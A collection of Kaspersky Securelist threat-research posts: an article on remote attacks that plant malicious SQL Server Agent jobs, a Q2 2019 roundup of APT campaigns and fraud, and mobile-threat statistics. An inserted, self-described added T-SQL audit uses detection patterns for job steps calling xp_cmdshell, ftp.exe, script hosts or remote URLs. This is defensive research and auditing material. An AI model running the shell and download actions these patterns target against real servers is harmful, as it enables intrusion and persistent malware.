Kaspersky Securelist


Agent 1433: remote attack on Microsoft SQL Server

22 August 2019 - 12:00

All over the world, companies large and small use Microsoft SQL Server for database management. Highly popular yet insufficiently protected, this DBMS is a target of choice for hacking. One of the most common attacks on Microsoft SQL Server — the remote attack based on malicious jobs — has been around for a long time, but it is still used to gain access to workstations through weak administrator passwords.

Figure: geography of attempted attacks, January through July 2019

According to our statistics, the majority of such attacks fall on Vietnam (>16%), Russia (~12%), India (~7%), China (~6%), Turkey and Brazil (5% each).

Attack description

Microsoft SQL Server attacks are normally massive in nature and have no particular target: the attackers scan sub-networks in search of a server with a weak password. The attack begins with a remote check of whether the system has MS SQL Server installed; next, the intruders brute-force the account password to access the system. In addition to password brute-forcing, they may also authenticate with the token of a user account that is already authorized on a previously infected machine.

SQL Server authorization

As soon as penetration is accomplished, the attackers modify the server configuration in order to gain access to the command line. That done, they can covertly establish persistence for the malware on the target system using jobs they create for SQL Server Agent.

Examples of jobs

A job is a sequence of commands executed by SQL Server Agent. It may comprise a broad range of actions, including launching SQL transactions, command line applications, Microsoft ActiveX scripts, Integration Services packages, Analysis Services commands and queries, as well as PowerShell scripts.

A job consists of steps; the code in each step is executed at set intervals, which lets intruders deliver malicious files to the target computer again and again should the files be deleted.

Below are a few examples of malicious queries:

  • Installing a malware download job using the standard ftp.exe utility:
  • Downloading malware from a remote resource using JavaScript:
  • Writing a malware file into the system followed by its execution:

We have analyzed the payloads delivered to the compromised machines via malicious jobs and found that most of them were cryptocurrency miners and remote access backdoors. The less common ones included password capture and privilege escalation utilities. It should be mentioned, however, that the choice of payload depends on the attackers’ goals and capabilities and is by no means limited to the options mentioned.

To protect your machines from malicious job attacks, we recommend using robust, brute-force-proof passwords for your SQL Server accounts. It will also pay to check SQL Server Agent for third-party jobs.
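The following T-SQL audit is an added example (not from the Securelist article) that checks a server for the two conditions described above: a configuration changed to expose the command shell, and Agent jobs whose steps run OS commands, scripts or PowerShell. It uses only the documented msdb and sys.configurations catalog views and assumes a login with sysadmin rights.

```sql
-- Added defender-side audit (not code from the article). Run as sysadmin.

-- 1. Server options attackers flip to reach the command line.
--    value_in_use = 1 for xp_cmdshell on a plain database server is a red flag.
SELECT name,
       CONVERT(int, value_in_use) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Agent XPs', 'show advanced options')
ORDER BY name;

-- 2. Every Agent job step that runs outside the T-SQL subsystem
--    (CmdExec, PowerShell, ActiveScripting), plus T-SQL steps that shell out
--    or match the download patterns named in the article (ftp.exe, script hosts,
--    remote URLs). Review owner, creation date, schedule and the full command.
SELECT j.name                   AS job_name,
       SUSER_SNAME(j.owner_sid) AS job_owner,
       j.enabled,
       j.date_created,
       j.date_modified,
       s.step_id,
       s.step_name,
       s.subsystem,
       s.command,
       sch.name                 AS schedule_name
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s
  ON s.job_id = j.job_id
LEFT JOIN msdb.dbo.sysjobschedules AS js
  ON js.job_id = j.job_id
LEFT JOIN msdb.dbo.sysschedules AS sch
  ON sch.schedule_id = js.schedule_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell', 'ActiveScripting')
   OR s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%ftp.exe%'
   OR s.command LIKE '%ftp -s:%'
   OR s.command LIKE '%cscript%'
   OR s.command LIKE '%wscript%'
   OR s.command LIKE '%http://%'
   OR s.command LIKE '%https://%'
ORDER BY j.date_created DESC, j.name, s.step_id;

-- 3. Remediation once the unknown jobs have been reviewed: remove each one by name
--    (placeholder below) and close the command shell again.
-- EXEC msdb.dbo.sp_delete_job @job_name = N'<suspicious job name>';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

Jobs created by legitimate maintenance tools will also appear in query 2; the job owner and creation date, compared against change records, separate those from jobs planted after a password brute-force.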

Kaspersky Lab products return the following verdicts when detecting malware that installs malicious SQL Server jobs:

  • Trojan.Multi.GenAutorunSQL.a
  • HEUR:Backdoor.Win32.RedDust.gen
  • HEUR:Backdoor.MSIL.RedDust.gen

Proactive detection is also provided by the System Watcher component:

  • PDM:Trojan.Win32.GenAutorunSqlAgentJobRun.*
  • PDM:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

IT threat evolution Q2 2019

19 August 2019 - 12:00

Targeted attacks and malware campaigns

More about ShadowHammer

In March, we published the results of our investigation into a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels.

ASUS was not the only company used by the attackers. Other targets included several gaming companies, a conglomerate holding company and a pharmaceutical company – all located in South Korea. Either the attackers had access to the source code of the victims’ projects or they injected malware at the time of project compilation – indicating that they had already compromised the networks of those companies.

Our analysis of the sophisticated backdoor deployed by the attackers revealed that it was an updated version of the ShadowPad backdoor used in supply-chain attacks that we reported in 2017. The newly updated version used by ShadowHammer follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. The attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain. We also found that ShadowHammer reused algorithms used in multiple malware samples, including PlugX – a backdoor that is quite popular among Chinese-speaking hacker groups.

This supply-chain attack is a landmark in the cyberattack landscape, indicating that even reputable vendors may suffer from the compromise of digital certificates and raising concerns about the software development infrastructure of all other software companies. The attackers behind ShadowHammer were able to add a backdoor to developer tools and inject malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. It’s important that software vendors add another line to their software build conveyor to check software for potential malware injection – even after the code has been digitally signed.

You can read more in our report.

The ongoing activities of Roaming Mantis

In February, we detected new activity by the Roaming Mantis threat actor. This group has evolved significantly in a short space of time. The activities of Roaming Mantis were first reported in 2017, when it targeted Android. Its distribution method was SMS and it concentrated on just one country – South Korea. Since then, the scope of the group’s activities has widened considerably. Roaming Mantis now supports 27 languages, targets iOS as well as Android and includes crypto-mining for PCs in its arsenal.

The key finding of our latest research is that Roaming Mantis continues to seek ways to compromise iOS devices. The group has even built a landing page for iOS users. When the victim visits this page, they see a pop-up message guiding them to the malicious iOS mobile config installation. Following installation of this mobile configuration, the phishing site automatically opens in a web browser and sends collected information from the device to the attackers’ server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

Our telemetry also uncovered a new wave of malicious APK files targeting Android devices. Our analysis has confirmed that this is a variant of the sagawa.apk Type A malware that was previously distributed via SMS in Japan. Roaming Mantis also continues the DNS manipulation it has used in earlier campaigns.

The countries most affected by this campaign are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. We have detected this malware over 6,800 times for over 950 unique users during this period. However, we believe the scale of this attack wave is much bigger and that these numbers reflect only a small part of the campaign.

The muddy waters of Middle East APTs

In April, we provided an analysis of the tools used by the MuddyWater threat actor following initial infection of its targets. MuddyWater, which first surfaced in 2017, is an APT group that focuses on government bodies and telecommunications companies in the Middle East – Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon, and also a few other nearby countries – Azerbaijan, Pakistan and Afghanistan. The group uses an array of customized attack tools, mostly developed by the group itself using Python, C# and PowerShell, to compromise their victims and exfiltrate data.

MuddyWater also employs deceptive techniques to divert investigations once they have deployed attack tools inside a victim’s system, such as Chinese strings, Russian strings and impersonation of the ‘RXR Saudi Arabia’ hacking group.

This threat actor has expanded its targets and malware arsenal in recent years; and we expect the group to continue developing. However, while moderately sophisticated in terms of its tools, the group’s current OPSEC is poor, leaving details that could reveal different types of information about the attackers.

ScarCruft continues to evolve

We continue to track the activities of ScarCruft, a Korean-speaking and alleged state-sponsored threat actor that typically targets organizations with links to the Korean peninsula. This group, which has shown itself to be highly skilled and resourceful, continues to develop.

Our most recent investigation shows that throughout 2018 the group used a multi-stage process to update each of its malware modules effectively while also evading detection. The group continues to use spear-phishing and known exploits as initial attack vectors. Once they have compromised a target, the attackers install an initial dropper, which uses a known exploit for CVE-2018-8120 to bypass Windows UAC and executes the next payload, a downloader, with higher privileges. This connects to the C2 server to download the next payload, which they hide in an image using steganography. This is a full-featured backdoor and information exfiltration RAT (Remote Access Trojan) known as ROKRAT. This malware can download additional payloads, execute Windows commands, save screenshots and audio recordings, and exfiltrate files.

We also discovered an interesting piece of rare malware created by ScarCruft – a Bluetooth device harvester. They use this to collect information directly from infected devices, including device name, class, whether it’s connected to anything else, address, authentication state and whether it’s trusted or remembered.

We believe that ScarCruft is primarily targeting intelligence for political and diplomatic purposes. Our telemetry revealed several victims of this campaign – investment and trading companies in Vietnam and Russia that we believe may have links to North Korea. ScarCruft also attacked a diplomatic agency in Hong Kong and another diplomatic agency in North Korea.

We discovered that one victim from Russia had also triggered a malware detection while staying in North Korea in the past. This target had been infected with GreezeBackdoor, a tool of the DarkHotel APT group. The victim had also been attacked using the Konni malware – malware disguised as a North Korean news item in a weaponized document called ‘Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip’. This is not the first time that we have seen an overlap of ScarCruft and DarkHotel threat actors: it is something that members of our team have discussed at security conferences and we have shared details on the overlap with our threat intelligence customers in the past. Both threat actors are Korean speaking, although they seem to have different TTPs (Tactics, Techniques and Procedures).

To learn more about our intelligence reports, or to request more information on a specific report, please contact intelreports@kaspersky.com.

The Zebrocy multi-language malware salad

We recently reported on activity by the APT threat actor Zebrocy. This is a Russian-speaking group, with roots going back to 2013, which specializes in victim profiling and access. Zebrocy shares malware artefacts and more with both the Sofacy and BlackEnergy threat actors, suggesting that the group has a supportive role as a sub-group. Sofacy is believed by many to have targeted the 2016 US elections. BlackEnergy is the group behind the 2015 attacks on the Ukrainian power grid. In addition, another threat actor, Turla, deployed spear-phishing macros that were almost identical to previous, non-public Zebrocy code in 2018. It seems that Zebrocy is used to gain an initial foothold in target systems before the other groups deploy their destructive and espionage tools.

In its most recent campaign, Zebrocy used spear-phishing to deliver a new Nim downloader to targets across the globe – including targets in Germany, the UK, Afghanistan, Kazakhstan, Kyrgyzstan, Tajikistan, Turkmenistan, Syria, Iran, Myanmar and Tanzania.

Platinum returns

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and South East Asia. This campaign, which could date back to 2012, features a multi-stage approach. We dubbed it ‘EasternRoppels’. The threat actor behind the campaign, which we believe to be the PLATINUM APT group, uses an elaborate, previously unseen, steganographic technique to conceal communication.

For this campaign, the operators used WMI (Windows Management Instrumentation) subscriptions to run an initial PowerShell downloader that drops a small PowerShell backdoor. We noticed that many of the initial WMI PowerShell scripts had different hardcoded C2 IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning that the malware only worked during a certain period every day). The C2 addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system, since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

We were investigating another threat at the same time, which we believe to be the second stage of the same campaign. After deeper analysis, we realized that the two threats were related: among other things, both attacks used the same domain to store exfiltrated data, and both types of malware infected some of the victims at the same time. In the second stage, all executable files were protected with a runtime cryptor and after unpacking them we found another, previously undiscovered, backdoor that is related to PLATINUM.

A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It’s also interesting that the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular.

The Gaza Cybergang SneakyPastes campaign

Gaza Cybergang is a politically motivated Arabic-language threat actor that is actively targeting the Middle East and North Africa, with particular focus on the Palestinian Territories. There has been confusion surrounding the group’s activities: notwithstanding the alignment of goals, the group’s activities seemed scattered and involved different tools and malware.

Our monitoring of the group’s activities in 2018 has led us to distinguish between three attack groups that operate under the umbrella of this threat actor – they are Gaza Cybergang Group1 (aka ‘MoleRATs’), Gaza Cybergang Group2 (aka ‘Desert Falcons’) and Gaza Cybergang Group3 (aka ‘Operation Parliament’). We have reported the activities of the last two in previous reports. Our latest report focuses on the first, Gaza Cybergang Group1 or MoleRATs.

This is the least sophisticated of the three attack groups and relies heavily on the use of paste sites, in an operation named ‘SneakyPastes’, to gradually sneak one or more remote access Trojans (RATs) onto victims’ systems. The group has been recorded employing phishing and several chained stages to try to evade detection and extend the life of its C2 servers. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking. Our telemetry shows there were victims in 39 countries, with most of the 240 unique victims located in the Palestinian Territories, followed by Jordan, Israel and Lebanon.

TajMahal: a sophisticated new APT framework

In autumn 2018, we discovered a previously unknown APT framework, which we named ‘TajMahal’, that had been active for the previous five years. It is a sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers; and even its own file indexer for the victim’s computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset.

There are two different packages, self-named ‘Tokyo’ and ‘Yokohama’ and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes.

The malware includes extensive functions for stealing data. This includes stealing cookies, intercepting documents in the printer queue, gathering data from backup copies of iOS devices, recording and taking screenshots of VoIP calls, stealing CD images made by the victim, indexing files, including those on external drives, and stealing data when the drive is subsequently detected again.

So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia.

FIN7 cybercrime operations continue

During 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some people believed that the arrest would have an impact on the group’s operations. This doesn’t seem to have been the case. In fact, CobaltGoblin and FIN7 have extended the number of groups operating under their umbrella: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or PoS infrastructure. It relies on a Griffon JScript backdoor and Cobalt/Meterpreter and, in recent attacks, PowerShell Empire. The second is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.

We believe with a reasonable level of confidence that the AveMaria botnet is linked to these two groups: AveMaria targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties with FIN7.

All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by the framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.

You can read more in our FIN7 report.

Zero-day vulnerability in win32k.sys

In March, our AEP (Automatic Exploit Prevention) technology detected an attempt to exploit a vulnerability in Windows. Further analysis led to us discovering a zero-day vulnerability in ‘win32k.sys’ – the fifth consecutive exploited Local Privilege Escalation vulnerability that we had discovered in recent months. We reported the vulnerability to Microsoft on March 17, who assigned it CVE-2019-0859 and released a patch on April 9.

This is a Use-After-Free vulnerability present in the ‘CreateWindowEx’ function. The exploit we found in the wild was used to target 64-bit versions, from Windows 7 to the latest builds of Windows 10. Exploitation of the vulnerability allows the malware to download and execute a script written by the attackers, which in the worst-case scenario could provide an attacker with full control over the infected PC. The attackers were able to gain sufficient privileges to install a PowerShell backdoor and use this to obtain full access to the compromised computer.

Plurox: a modular backdoor

Earlier this year, we came across a curious backdoor that we named Plurox. Our analysis revealed that the malware has some quite unpleasant features. It can spread over a local network using an exploit, provide access to the attacked network and install miners and other malicious software on victims’ computers. The backdoor is also modular, so the attackers can expand its functionality using plugins, as required.

The malware can install one of several crypto-currency miners, depending on the system configuration. The bot sends a package with the system configuration to the C2 server and in response it receives information about which plugin to download. In all, we counted eight mining modules.

We also found a UPnP plugin. This module receives a subnet with mask /24 from the C2 server, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP addresses on the router using the UPnP protocol. If this is successful, it reports the result to the C2 server, waits for 300 seconds (five minutes) and then deletes the forwarded ports. We assume the attackers use this plugin to attack a local network. It would take an attacker just five minutes to sort through all the existing exploits for services running on these ports. If the administrators notice the attack on the host, they will see the attack coming directly from the router, not from a local machine. This attack, if successful, will help the cybercriminals gain a foothold in the network.

There is also an SMB module that’s responsible for spreading malware over the network using the EternalBlue exploit.

Other security news

Digital doppelgangers

In April, we published the results of our investigation into Genesis, an e-shop that is trading over 60,000 stolen and legitimate digital identities. This marketplace, along with other malicious tools used by cybercriminals, is designed to abuse the machine learning-based anti-fraud approach of ‘digital masks’.

Every time we enter our financial, payment and personal information during an online transaction, anti-fraud solutions match us against a digital mask, a unique, trusted customer profile based on known device and behavior characteristics that allows the financial organization’s anti-fraud teams to determine if the transaction is legitimate.

However, a digital mask can be copied. Our investigation found that cybercriminals are actively using such ‘digital doppelgangers’ to bypass advanced anti-fraud measures. The Genesis dark net marketplace is an online shop selling stolen digital masks and user accounts at prices ranging from $5 to $200 each. Its customers simply buy previously stolen digital masks together with stolen logins and passwords to online shops and payment services, and then launch them through a browser and proxy connection to mimic real user activity. If they have the legitimate user’s account credentials, the attacker can then access their online accounts or make new, trusted transactions in their name.

Other tools enable attackers to create from scratch their own unique digital masks that will not trigger anti-fraud solutions. We investigated one such tool, a special Tenebris browser with an embedded configuration generator to develop unique fingerprints. Once created, a carder can simply launch the mask through a browser and proxy connection and conduct any operations online.

To enhance security, we recommend that businesses enable multi-factor authentication at every stage of the user validation processes, consider introducing additional methods of verification, such as biometrics, harness the most advanced analytics for user behavior and integrate threat intelligence feeds into SIEM and other security controls in order to get access to the most relevant and up-to-date threat data.

Potential problems with third-party plugins

We recently looked at plugins and some of the potential problems associated with them.

Online stores, information portals and other resources are often based on platforms that provide developers with a set of ready-made tools. Features they need are usually available as plugins, allowing them to cherry-pick the functionality they need. Plugins are small software modules that either add to, or improve, the functionality of a website, for example, to display social network widgets, harvest statistics or to create surveys and other types of content. Plugins save developers from having to reinvent the wheel every time they need a particular feature.

However, things can go wrong. Plugins run automatically and don’t make their presence known unless something goes wrong. If the creator of the plugin abandons it, or sells it to another developer, it will not necessarily be apparent. If a plugin isn’t updated for a long time, it’s likely to contain unpatched vulnerabilities that could be exploited to take control of a web site or download malware. Even when updates are available, website owners often overlook them; and vulnerable modules can remain active years after the developer has withdrawn support for them.

Some content management platforms block the download of unsupported modules. However, it is not possible for a developer to delete vulnerable plugins from users’ websites, since this could cause disruption. Moreover, abandoned plugins might be stored, not on the platform itself, but on publicly available services. When the creator discontinues support or deletes a module, a website will continue to access the container in which it was located. Cybercriminals can easily capture or clone this abandoned container, forcing the resource to download malware instead of the plugin.

This is what happened with the New Share Counts tweet counter, hosted on Amazon S3 cloud storage. The developer posted a message on their website saying that they had withdrawn support for the plugin, but more than 800 clients did not read it. When the plugin writer later closed the container on Amazon S3, the cybercriminals created their own storage with the exact same name and put a malicious script inside it. Websites still using the plugin began to load the new code, which redirected users to a phishing resource promising a prize for taking part in a survey, rather than the tweet counter. Something similar can happen if a developer decides to sell their plugin and isn’t choosy about who they sell it to.

We recommend that companies independently monitor the security of plugins on their website and take appropriate action to ensure that they are safe.

Game of threats

Torrent sites have always been the go-to places for those seeking pirated versions of games and other software, as well as Hollywood blockbusters. However, in recent years, popular TV shows have joined the list of content on such sites. This provides opportunities for cybercriminals to spread malware. One study, conducted in 2015, reported that bootlegged content accounts for 35% of files shared via BitTorrent; and more than 99% of the counterfeit files analyzed linked to either malware or scam websites.

We recently looked at threats disguised as new episodes of popular TV shows distributed through torrent sites, to see which ones were the most popular and what kinds of threats cybercriminals are distributing in this way. The total number of people who encountered malware related to a TV show in 2018 was 126,340: this is around a third less than in 2017, but still a significant number. The top three TV shows most often used as bait are Game of Thrones, The Walking Dead and Arrow. Game of Thrones accounted for 17% of pirated content, even though this was the only TV show in our list that did not screen any new episodes in 2018. The top three most popular threat categories were Trojan, Downloader and AdWare. The full details are included in our report, including our tips on how to avoid threats coming from content distributing platforms.

Many people choose to stream TV content these days. This also provides opportunities for cybercriminals who claim to provide free downloads in return for the personal data of anyone who wants to view content without paying for it, or to those who live in a region where the content is not available. This year’s Game of Thrones premiere broke records; and we saw a spike in cybercriminal activity related to the show: the number of attacks almost quadrupled following the premiere.

Large-scale SIM-swap fraud

SIM-swap fraud occurs when a criminal masquerades as a customer of a mobile phone operator and persuades the company to give them a replacement SIM. They use stolen personal details to impersonate the victim. The new SIM gives the criminal control of the victim’s mobile phone number, allowing them to assume the victim’s identity. If the victim has opted to receive one-time passcodes via SMS, the criminal can use these, with other stolen credentials, to obtain access to their online accounts, including their bank account.

We recently investigated SIM-swap fraud in Brazil and Mozambique. Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow people to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. However, criminals are using SIM-swap fraud to target mobile payments; and people are losing money on a major scale.

Fraudsters use social engineering, bribery, or even a simple phishing attack to take control of customers’ phone numbers and intercept mobile money transactions or one-time passcodes to complete a transfer of funds or steal people’s money.

In Mozambique, this sort of crime has been widely reported in the national news, with the media questioning the integrity of the banks and mobile operators, suggesting that they may be colluding in the scams. Since the reputation of the banks and operators was at stake, they had to take urgent action to protect their customers. At Mozambique’s largest bank, they had a monthly average of 17.2 cases of SIM-swap fraud, but the true impact nationwide is difficult to estimate, as most banks don’t publicly share statistics. Some of the victims were high-profile business people, who had up to US$50,000 stolen from their accounts.

In Brazil, the problem also affected politicians, ministers, governors and high-profile business people, as well as ordinary citizens. One organized gang alone in Brazil was able to SIM-swap 5,000 victims.

Our report outlines the problem faced in both countries and a local solution developed in Mozambique that drastically reduced the level of fraud.

The problems with legal spyware

Spyware might sound like something from a Hollywood movie, but you can buy commercial versions of such programs – known as ‘stalkerware’ – for just a few dollars. They let you spy on someone simply by installing an app on their smartphone or tablet. Once installed, such apps remain hidden and provide access to a range of personal data, including device location, browsing history, SMS messages, social media chats and more. Some even make video and voice recordings.

Such apps are usually legal, which is why we identify them formally as ‘not-a-virus: Monitor’ when alerting someone to their presence. Their developers often market them as parental control software; and significant numbers of people download and use them – in 2018, we detected stalkerware on the devices of more than 58,000 people.

Leaving aside the moral aspects of installing such apps on someone else’s device, there are several things that make them a bad idea.

Most of these apps fail to comply with the policies of official stores such as Google Play, so they tend to be found on dedicated sites that are ‘off the beaten track’; and because installing them requires the user to enable installation of apps from outside the official store, they leave the device more exposed to attack.

Stalkerware apps often request system rights, sometimes including root access, giving the app full control of the device, including the right to install other apps. Some also insist that the person using the device allow them to deactivate or remove protection solutions.

These apps upload personal data from the device to the vendor’s server, where the person who installed the app can review it. However, the lack of security could expose that data to hackers.

Legitimate apps, unlike stalkerware, do not hide themselves on the device, deactivate security solutions or pose a threat to the privacy of their customers. They are also available in official marketplaces.

To protect yourself from stalkerware, secure your devices with a strong password and don’t disclose it to anyone, block installation of third-party apps, check installed apps regularly, delete any that you don’t need and protect your devices with a reputable security product.

The WhatsApp call that opens up a device to surveillance

A zero-day vulnerability in WhatsApp, reported in May, allowed an attacker to eavesdrop on devices running the app. The attacker could read encrypted chats, turn on the microphone and camera and install spyware to allow further surveillance, such as browsing through the victim’s photos and videos, accessing their contact list and more.

To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The attackers used this method not only to snoop on people’s chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device.

The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released patches for the vulnerability on May 13. Some have suggested that the spyware may be Pegasus, developed by Israeli company NSO.

High severity bugs in VLC media player

In June, VideoLAN, the developers of the open source VLC media player, issued patches for two high-severity bugs – an out-of-bound write vulnerability and a stack-buffer-overflow bug. These were two of 33 fixes issued in the wake of a new bug bounty program funded by the European Commission as part of the Free and Open Source Software Audit (FOSSA) project. You can read more here.

Smart speakers, smart listeners

Amazon has come under fire for its privacy policies following a report by Bloomberg that the company hires auditors to listen to Amazon Echo recordings, in an effort to improve the ability of its digital assistant to understand human speech. The team of auditors listens to voice recordings after the word ‘Alexa’ is used to wake up the device and picks a small number of interactions from a random set of users to annotate. One especially alarming aspect of the report is the suggestion that, although Amazon provides customers with an opt-out, recordings sometimes start without the device ‘hearing’ the wake-word.

Amazon recently filed a patent based on the idea of ‘voice-sniffing’ that would allow its smart speaker to eavesdrop on all conversations and analyze them. If implemented, such technology would allow the company to listen-in to unguarded conversations, undermining people’s privacy. It would also provide Amazon with a wealth of data that it could use for targeted advertising.

Growing numbers of people are taking advantage of the convenience that smart speakers offer. However, remember that they are also smart listeners. You should review the privacy settings of any smart device that you buy and disable any functionality that you’re not comfortable with.

Privacy matters

Personal information is a valuable commodity. The value of personal data is evident from the steady stream of data breaches reported in the news. Sometimes, we are tricked into exposing confidential data – maybe because we’re too eager to click on attachments or links in email messages, or because we’re not careful enough when looking for a good deal online. However, sometimes our personal information is exposed when an online provider fails to secure it properly.

There’s not much we can do to prevent the loss or theft of data from an online company. However, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, by using two-factor authentication and by restricting the amount of data that we choose to share online.

Information is valuable not just to cybercriminals, but to legitimate companies. Often, it is the ‘price’ we pay for ‘free’ products and services, including browsers, email accounts and social network accounts. It’s not always clear how our data will be used by online providers, so it’s essential to check the privacy settings carefully and opt out of anything you’re not comfortable with. Of course, where it’s not possible to opt out, you may need to think again about signing up for the service, or deleting your account if you have already done so.

In May, we illustrated some of these issues by looking back at some of the scandals surrounding Facebook’s handling of personal data over the last two years.

IT threat evolution Q2 2019. Statistics

19 August, 2019 - 12:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
  • 217,843,293 unique URLs triggered Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.
  • Ransomware attacks were defeated on the computers of 232,292 unique users.
  • Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 753,550 malicious installation packages
    • 13,899 installation packages for mobile banking Trojans
    • 23,294 installation packages for mobile ransomware Trojans
Mobile threats

Quarterly highlights

Q2 2019 will be remembered for several events.

First, we uncovered a large-scale financial threat by the name of Riltok, which targeted clients of not only major Russian banks, but some foreign ones too.

Second, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.

Third, we repeated our study of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.

Fourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its process being terminated, the adware launches a music player and plays a silent file. The operating system treats this as the user listening to music and does not end the process, which is not displayed on the main screen of the device. At this point the device is operating as part of a botnet, supposedly showing ads to the victim. “Supposedly” because ads are also shown in background mode, when the victim might not be using the device.

Fifth, our attention was caught by the Hiddapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.

Finally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia’s largest IT companies:

Mobile threat statistics

In Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.


Number of detected malicious installation packages, Q3 2018 – Q2 2019 (download)

What’s more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop reflects reduced activity by cybercriminals in adding new members to the most common families.

Distribution of detected mobile apps by type


Distribution of newly detected mobile apps by type, Q1 and Q2 2019 (download)

Among all the threats detected in Q2 2019, the lion’s share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).

In second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).

Trojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) – this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.

